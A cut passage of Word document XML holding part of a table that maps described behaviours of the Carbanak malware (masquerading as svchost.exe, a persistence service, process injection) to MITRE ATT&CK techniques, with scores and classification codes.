              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BC1E097" w14:textId="0220B892" w:rsidR="00AB5764" w:rsidRPr="00B54923" w:rsidRDefault="001B25D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>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40" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77D1B381" w14:textId="0E29D13D" w:rsidR="00AB5764" w:rsidRPr="00B54923" w:rsidRDefault="001B25D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C45974" w:rsidRPr="00C45974">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Masquerading: </w:t>
            </w:r>
            <w:r w:rsidRPr="001B25D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Match </w:t>
            </w:r>
            <w:r w:rsidRPr="001B25D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Legitimate Name or Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42E053F9" w14:textId="00A3B438" w:rsidR="00AB5764" w:rsidRPr="00B54923" w:rsidRDefault="00282006" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="330257E4" w14:textId="77777777" w:rsidR="00AB5764" w:rsidRPr="00B54923" w:rsidRDefault="00AB5764" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BF296E6" w14:textId="4DAB5566" w:rsidR="00AB5764" w:rsidRDefault="001B25D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2493E3ED" w14:textId="41D1AD31" w:rsidR="00AB5764" w:rsidRPr="00B54923" w:rsidRDefault="001B25D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E74AF43" w14:textId="77777777" w:rsidR="001B25D9" w:rsidRPr="001B25D9" w:rsidRDefault="001B25D9" w:rsidP="001B25D9">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001B25D9">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001B25D9">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> copies itself into “%system32%\com” with the name “svchost.exe” with </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D747F46" w14:textId="77777777" w:rsidR="001B25D9" w:rsidRPr="001B25D9" w:rsidRDefault="001B25D9" w:rsidP="001B25D9">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B25D9">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">the file attributes: system, hidden and read-only. The original file created by the </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="589BC400" w14:textId="3943636B" w:rsidR="00AB5764" w:rsidRPr="00B54923" w:rsidRDefault="001B25D9" w:rsidP="001B25D9">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B25D9">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>exploit payload is then deleted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="00B54923" w14:paraId="28636DA9" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6554963A" w14:textId="4375EE24" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="006A5BAF" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79140CF4" w14:textId="1B997465" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1141DD56" w14:textId="0972BF58" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1543.003 Create or Modify System Process: Windows Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D4E6EA" w14:textId="5CBD2784" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36811C32" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77F13847" w14:textId="51F4A215" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50AB5B1A" w14:textId="082AB611" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00564233" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F21283B" w14:textId="77777777" w:rsidR="00564233" w:rsidRPr="00564233" w:rsidRDefault="00564233" w:rsidP="00564233">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">To ensure that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> has autorun privileges the malware creates a new </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66114196" w14:textId="77777777" w:rsidR="00564233" w:rsidRPr="00564233" w:rsidRDefault="00564233" w:rsidP="00564233">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>service. The naming syntax is “&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>ServiceName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;Sys” where </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>ServiceName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> is any </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D2C1D8" w14:textId="3F0E15E6" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00564233" w:rsidP="00564233">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564233">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>existing service randomly chosen, with the first character deleted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008417BD" w:rsidRPr="00B54923" w14:paraId="0B5802E7" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51295A3C" w14:textId="23D1D999" w:rsidR="008417BD" w:rsidRPr="00B54923" w:rsidRDefault="006A5BAF" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A779E2B" w14:textId="77777777" w:rsidR="008417BD" w:rsidRPr="00B54923" w:rsidRDefault="008417BD" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A151AB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A151AB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A151AB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A151AB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A151AB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19FBA074" w14:textId="77777777" w:rsidR="008417BD" w:rsidRPr="00B54923" w:rsidRDefault="008417BD" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1036.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C45974">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">Masquerading: </w:t>
            </w:r>
            <w:r w:rsidRPr="001B25D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Match Legitimate Name or Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65474AE5" w14:textId="5FA1E67E" w:rsidR="008417BD" w:rsidRPr="00B54923" w:rsidRDefault="00BC3894" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B111B57" w14:textId="77777777" w:rsidR="008417BD" w:rsidRPr="00B54923" w:rsidRDefault="008417BD" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A52C4E0" w14:textId="77777777" w:rsidR="008417BD" w:rsidRDefault="008417BD" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3457B159" w14:textId="77777777" w:rsidR="008417BD" w:rsidRPr="00B54923" w:rsidRDefault="008417BD" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D1E4933" w14:textId="77777777" w:rsidR="008417BD" w:rsidRPr="008417BD" w:rsidRDefault="008417BD" w:rsidP="008417BD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008417BD">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008417BD">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> creates a file with a random name and a .bin extension in</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBF20BF" w14:textId="1DEAFAC1" w:rsidR="008417BD" w:rsidRPr="00B54923" w:rsidRDefault="008417BD" w:rsidP="008417BD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008417BD">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>%COMMON_APPDATA%\Mozilla where it stores commands to be executed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="003E52D1" w14:paraId="7DBF3BF9" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BE4CF67" w14:textId="397C59F8" w:rsidR="00B707D9" w:rsidRDefault="00A151AB" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="006A5BAF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23F57AC3" w14:textId="0F643C3E" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">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240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B73443D" w14:textId="777F972A" w:rsidR="00B707D9" w:rsidRPr="00C224B4" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00791CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00791CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1055 </w:t>
            </w:r>
            <w:r w:rsidR="0058741C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0058741C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00791CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Process Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="300D90E2" w14:textId="1556458D" w:rsidR="00B707D9" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AC46308" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E64C6BC" w14:textId="30FAE190" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="137BF4D6" w14:textId="696B8C20" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE158C4" w14:textId="15A6DBE0" w:rsidR="00A151AB" w:rsidRDefault="00A151AB" w:rsidP="00A151AB">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> injects its code into svchost.exe. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156C7B34" w14:textId="04F442EC" w:rsidR="00B707D9" w:rsidRDefault="00B707D9" w:rsidP="00A151AB"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="003E52D1" w14:paraId="5621A4E7" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
